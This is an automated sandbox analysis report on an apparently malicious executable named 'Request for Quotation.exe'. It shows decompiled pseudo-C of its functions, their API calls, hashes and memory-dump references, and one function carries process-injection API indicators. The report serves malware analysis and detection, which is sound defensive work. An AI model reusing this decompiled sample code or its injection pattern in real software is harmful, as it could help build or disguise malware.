                                                                                0x00406620
                                                                                0x0040661a
                                                                                0x0040661a
                                                                                0x0040661a
                                                                                0x00406624
                                                                                0x00406638
                                                                                0x0040664c
                                                                                0x00406653

                                                                                APIs
                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065FF
                                                                                • wsprintfA.USER32 ref: 00406638
                                                                                • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                • String ID: %s%s.dll$UXTHEME$\
                                                                                • API String ID: 2200240437-4240819195
                                                                                • Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                                • Instruction ID: 7902db4e393e31f005eed81eae05c73ad43ba894215c6af4be7b8d9a3309d3f8
                                                                                • Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                                • Instruction Fuzzy Hash: 26F0217050020967EB149764DD0DFFB375CAB08304F14047BA586F10D1DAB9D5358F6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405E15, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405E15(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3ec; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                                                0x00405e19
                                                                                0x00405e1f
                                                                                0x00405e20
                                                                                0x00405e20
                                                                                0x00405e25
                                                                                0x00405e26
                                                                                0x00405e29
                                                                                0x00405e33
                                                                                0x00405e40
                                                                                0x00405e43
                                                                                0x00405e4b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e4f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e51
                                                                                0x00000000
                                                                                0x00405e51
                                                                                0x00000000

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00405E29
                                                                                • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405E43
                                                                                Strings
                                                                                • nsa, xrefs: 00405E20
                                                                                • "C:\Users\user\Desktop\Request for Quotation.exe" , xrefs: 00405E15
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E18
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CountFileNameTempTick
                                                                                • String ID: "C:\Users\user\Desktop\Request for Quotation.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                • API String ID: 1716503409-2930191687
                                                                                • Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                                • Instruction ID: 94097d04b6c38ee8b1870d6a931f35239ed30ef0cd20ec9d97f11959184772c3
                                                                                • Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                                • Instruction Fuzzy Hash: E4F0A7363442087BDB109F55EC44B9B7B9DDF91750F14C03BF984DA1C0D6B0D9988798
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 6F7116DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E6F7116DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x6f71405c = _a8;
				 *0x6f714060 = _a16;
				 *0x6f714064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6f714038, E6F711556);
				_push(1); // executed
				_t37 = E6F711A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E6F7122AF(_t54);
					}
					E6F7122F1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E6F7124D8(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E6F71156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E6F7124D8(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E6F7124D8(_t54);
							_t37 = GlobalFree(E6F711266(E6F711559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E6F71249E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E6F7114E2( *0x6f714058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E6F712CC3(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E6F712A38(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E6F7126B2(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}


















                                                                                0x6f7116db
                                                                                0x6f7116db
                                                                                0x6f7116db
                                                                                0x6f7116e5
                                                                                0x6f7116ed
                                                                                0x6f7116fa
                                                                                0x6f711708
                                                                                0x6f71170b
                                                                                0x6f71170d
                                                                                0x6f711712
                                                                                0x6f711717
                                                                                0x6f711836
                                                                                0x6f711836
                                                                                0x6f71171d
                                                                                0x6f711721
                                                                                0x6f711724
                                                                                0x6f711729
                                                                                0x6f71172b
                                                                                0x6f711731
                                                                                0x6f711737
                                                                                0x6f711767
                                                                                0x6f71176e
                                                                                0x6f711792
                                                                                0x6f7117dd
                                                                                0x6f711794
                                                                                0x6f711794
                                                                                0x6f711795
                                                                                0x6f71179b
                                                                                0x6f71179c
                                                                                0x6f7117a6
                                                                                0x6f7117a9
                                                                                0x6f7117ae
                                                                                0x6f7117b5
                                                                                0x6f7117b5
                                                                                0x6f7117bc
                                                                                0x6f7117c2
                                                                                0x6f7117c8
                                                                                0x6f7117d5
                                                                                0x6f7117d6
                                                                                0x6f7117d9
                                                                                0x6f711770
                                                                                0x6f711771
                                                                                0x6f711786
                                                                                0x6f711786
                                                                                0x6f7117e7
                                                                                0x6f7117ea
                                                                                0x6f7117f7
                                                                                0x6f7117fe
                                                                                0x6f711806
                                                                                0x6f711809
                                                                                0x6f711809
                                                                                0x6f711806
                                                                                0x6f711816
                                                                                0x6f71181e
                                                                                0x6f711823
                                                                                0x6f711816
                                                                                0x6f71182b
                                                                                0x00000000
                                                                                0x6f71182d
                                                                                0x00000000
                                                                                0x6f71182e
                                                                                0x6f71182b
                                                                                0x6f71173b
                                                                                0x6f71173e
                                                                                0x6f71175c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71175f
                                                                                0x6f711764
                                                                                0x6f711764
                                                                                0x6f711766
                                                                                0x00000000
                                                                                0x6f711766
                                                                                0x6f711740
                                                                                0x6f711741
                                                                                0x6f711749
                                                                                0x6f71174a
                                                                                0x00000000
                                                                                0x6f71174a
                                                                                0x6f711743
                                                                                0x6f711744
                                                                                0x6f711752
                                                                                0x00000000
                                                                                0x6f711752
                                                                                0x6f711747
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711747

                                                                                APIs
                                                                                  • Part of subcall function 6F711A98: GlobalFree.KERNEL32 ref: 6F711D09
                                                                                  • Part of subcall function 6F711A98: GlobalFree.KERNEL32 ref: 6F711D0E
                                                                                  • Part of subcall function 6F711A98: GlobalFree.KERNEL32 ref: 6F711D13
                                                                                • GlobalFree.KERNEL32 ref: 6F711786
                                                                                • FreeLibrary.KERNEL32(?), ref: 6F711809
                                                                                • GlobalFree.KERNEL32 ref: 6F71182E
                                                                                  • Part of subcall function 6F7122AF: GlobalAlloc.KERNEL32(00000040,?), ref: 6F7122E0
                                                                                  • Part of subcall function 6F7126B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F711757,00000000), ref: 6F712782
                                                                                  • Part of subcall function 6F71156B: wsprintfA.USER32 ref: 6F711599
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644261390.000000006F711000.00000020.00020000.sdmp, Offset: 6F710000, based on PE: true
                                                                                • Associated: 00000000.00000002.644238585.000000006F710000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644270262.000000006F713000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644290951.000000006F715000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                • String ID:
                                                                                • API String ID: 3962662361-3916222277
                                                                                • Opcode ID: 6b4941a869b4d38db6d1e9cddd4af3d59fd2642953384c2e61b36525dc000efe
                                                                                • Instruction ID: 0570e648a778ce666b218fc19b9419c4069cae4c560631ea742bf176ab0f76b9
                                                                                • Opcode Fuzzy Hash: 6b4941a869b4d38db6d1e9cddd4af3d59fd2642953384c2e61b36525dc000efe
                                                                                • Instruction Fuzzy Hash: 21415E711083089BDB00DF649B89B9537ECBF2A328F0C8576E9159E182DBB4E55DC7B1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004032BF, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E004032BF(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t48;

				_t33 =  *0x429464 -  *0x40b898 + _a4;
				 *0x42f450 = GetTickCount() + 0x1f4;
				if(_t33 <= 0) {
					L22:
					E00402E52(1);
					return 0;
				}
				E0040343E( *0x429474);
				SetFilePointer( *0x40a01c,  *0x40b898, 0, 0); // executed
				 *0x429470 = _t33;
				 *0x429460 = 0;
				while(1) {
					_t30 = 0x4000;
					_t11 =  *0x429468 -  *0x429474;
					if(_t11 <= 0x4000) {
						_t30 = _t11;
					}
					_t12 = E00403428(0x41d460, _t30);
					if(_t12 == 0) {
						break;
					}
					 *0x429474 =  *0x429474 + _t30;
					 *0x40b8a0 = 0x41d460;
					 *0x40b8a4 = _t30;
					L6:
					L6:
					if( *0x42f454 != 0 &&  *0x42f500 == 0) {
						 *0x429460 =  *0x429470 -  *0x429464 - _a4 +  *0x40b898;
						E00402E52(0);
					}
					 *0x40b8a8 = 0x415460;
					 *0x40b8ac = 0x8000;
					if(E0040677B(0x40b8a0) < 0) {
						goto L20;
					}
					_t35 =  *0x40b8a8; // 0x4188c7
					_t36 = _t35 - 0x415460;
					if(_t36 == 0) {
						__eflags =  *0x40b8a4; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t30;
						if(_t30 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x429464;
						if(_t16 -  *0x40b898 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405E8D( *0x40a01c, 0x415460, _t36); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b898 =  *0x40b898 + _t36;
					_t48 =  *0x40b8a4; // 0x0
					if(_t48 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}













                                                                                0x004032cf
                                                                                0x004032e2
                                                                                0x004032e7
                                                                                0x00403417
                                                                                0x00403419
                                                                                0x00000000
                                                                                0x0040341f
                                                                                0x004032f3
                                                                                0x00403306
                                                                                0x0040330c
                                                                                0x00403312
                                                                                0x0040331d
                                                                                0x00403322
                                                                                0x00403327
                                                                                0x0040332f
                                                                                0x00403331
                                                                                0x00403331
                                                                                0x0040333a
                                                                                0x00403341
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403347
                                                                                0x0040334d
                                                                                0x00403353
                                                                                0x00000000
                                                                                0x00403359
                                                                                0x0040335f
                                                                                0x0040337f
                                                                                0x00403384
                                                                                0x00403389
                                                                                0x0040338f
                                                                                0x00403395
                                                                                0x004033a6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004033a8
                                                                                0x004033ae
                                                                                0x004033b0
                                                                                0x004033d3
                                                                                0x004033d9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004033db
                                                                                0x004033dd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004033df
                                                                                0x004033df
                                                                                0x004033f2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403401
                                                                                0x00000000
                                                                                0x00403401
                                                                                0x004033ba
                                                                                0x004033c1
                                                                                0x0040340e
                                                                                0x00403414
                                                                                0x00403414
                                                                                0x00000000
                                                                                0x00403414
                                                                                0x004033c3
                                                                                0x004033c9
                                                                                0x004033cf
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403412
                                                                                0x00403412
                                                                                0x00000000
                                                                                0x00403412
                                                                                0x00000000

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 004032D3
                                                                                  • Part of subcall function 0040343E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 00403306
                                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,0040B8A0,0041D460,00004000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF), ref: 00403401
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FilePointer$CountTick
                                                                                • String ID: `TA
                                                                                • API String ID: 1092082344-1754987364
                                                                                • Opcode ID: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                                                • Instruction ID: bb82d22d1a80a93a7495f99719332701a8bc5653d470bc60fdd2df8261a6fa09
                                                                                • Opcode Fuzzy Hash: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                                                • Instruction Fuzzy Hash: 3A31B3726042159FDB10BF29EE849263BACFB40359B88813BE405B62F1C7785C428A9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 6EEE3034, Relevance: 6.5, APIs: 4, Instructions: 549processthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 6EEE3369
                                                                                • GetThreadContext.KERNELBASE(?,00010007), ref: 6EEE338C
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 6EEE33B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644186956.000000006EEE3000.00000040.00020000.sdmp, Offset: 6EEE0000, based on PE: true
                                                                                • Associated: 00000000.00000002.644129589.000000006EEE0000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644157709.000000006EEE1000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644176627.000000006EEE2000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644212634.000000006EEE8000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThread
                                                                                • String ID:
                                                                                • API String ID: 2411489757-0
                                                                                • Opcode ID: e0b41718201e984db639e1a29ac16d34ca8b5eb045ec74d54a4aaa76aa81e2d6
                                                                                • Instruction ID: 4730253e625433dd33aa017c7e79d573b6cdc6df15d589099ad605ab1be9d3e9
                                                                                • Opcode Fuzzy Hash: e0b41718201e984db639e1a29ac16d34ca8b5eb045ec74d54a4aaa76aa81e2d6
                                                                                • Instruction Fuzzy Hash: 46320631E50209EEEB50CFE4DC59BEDB7B5AF04705F20449AE618FA6A0E7709A84CF15
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 60%
                                                                                			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f518");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4e8 =  *0x42f4e8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00405374(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b890, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403A00(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                0x0040209d
                                                                                0x0040209d
                                                                                0x004020a2
                                                                                0x004020a9
                                                                                0x00402164
                                                                                0x004022dd
                                                                                0x004022dd
                                                                                0x00402a5a
                                                                                0x00402a5d
                                                                                0x00402a69
                                                                                0x00402a69
                                                                                0x004020b8
                                                                                0x004020c2
                                                                                0x004020c5
                                                                                0x004020d4
                                                                                0x004020d8
                                                                                0x004020de
                                                                                0x004020e2
                                                                                0x0040215d
                                                                                0x00000000
                                                                                0x0040215d
                                                                                0x004020e4
                                                                                0x004020ed
                                                                                0x004020f1
                                                                                0x00402135
                                                                                0x004020f3
                                                                                0x004020f6
                                                                                0x004020f9
                                                                                0x00402129
                                                                                0x004020fb
                                                                                0x004020fe
                                                                                0x00402107
                                                                                0x00402109
                                                                                0x00402109
                                                                                0x00402107
                                                                                0x004020f9
                                                                                0x0040213d
                                                                                0x00402152
                                                                                0x00402152
                                                                                0x00000000
                                                                                0x0040213d
                                                                                0x004020c8
                                                                                0x004020ce
                                                                                0x004020d2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                                  • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                  • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                  • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                  • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                • String ID:
                                                                                • API String ID: 2987980305-0
                                                                                • Opcode ID: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                                                • Instruction ID: e3fe6dffd4d776efa863efd9403cf6e1974d247a329121c392e1043855ccd094
                                                                                • Opcode Fuzzy Hash: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                                                • Instruction Fuzzy Hash: 2721EE32A00115EBCF20BF648F49B9F76B1AF14359F20423BF651B61D1CBBC49829A5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 87%
                                                                                			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405C7E(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405C10(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004058B7(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D4(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E0040583A(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040624D("C:\\Users\\jones\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                                                0x004015bb
                                                                                0x004015c2
                                                                                0x004015c5
                                                                                0x004015ca
                                                                                0x004015ce
                                                                                0x004015d0
                                                                                0x004015d8
                                                                                0x004015da
                                                                                0x004015dc
                                                                                0x004015e0
                                                                                0x004015e3
                                                                                0x004015fb
                                                                                0x004015fc
                                                                                0x004015e5
                                                                                0x004015e5
                                                                                0x004015e8
                                                                                0x00000000
                                                                                0x004015f3
                                                                                0x004015f4
                                                                                0x004015f4
                                                                                0x004015e8
                                                                                0x00401603
                                                                                0x0040160a
                                                                                0x00401617
                                                                                0x00401617
                                                                                0x0040160c
                                                                                0x0040160d
                                                                                0x00401615
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401615
                                                                                0x0040160a
                                                                                0x0040161a
                                                                                0x0040161d
                                                                                0x0040161f
                                                                                0x00401620
                                                                                0x004015d0
                                                                                0x00401627
                                                                                0x00401652
                                                                                0x004022dd
                                                                                0x00401629
                                                                                0x0040162b
                                                                                0x00401636
                                                                                0x0040163c
                                                                                0x00401644
                                                                                0x0040164a
                                                                                0x0040164a
                                                                                0x00401644
                                                                                0x00402a5d
                                                                                0x00402a69

                                                                                APIs
                                                                                  • Part of subcall function 00405C7E: CharNextA.USER32(?,?,0042BCC0,?,00405CEA,0042BCC0,0042BCC0,73BCFA90,?,73BCF560,00405A35,?,73BCFA90,73BCF560,00000000), ref: 00405C8C
                                                                                  • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405C91
                                                                                  • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405CA5
                                                                                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                  • Part of subcall function 0040583A: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
                                                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                                                Memory Dump Source
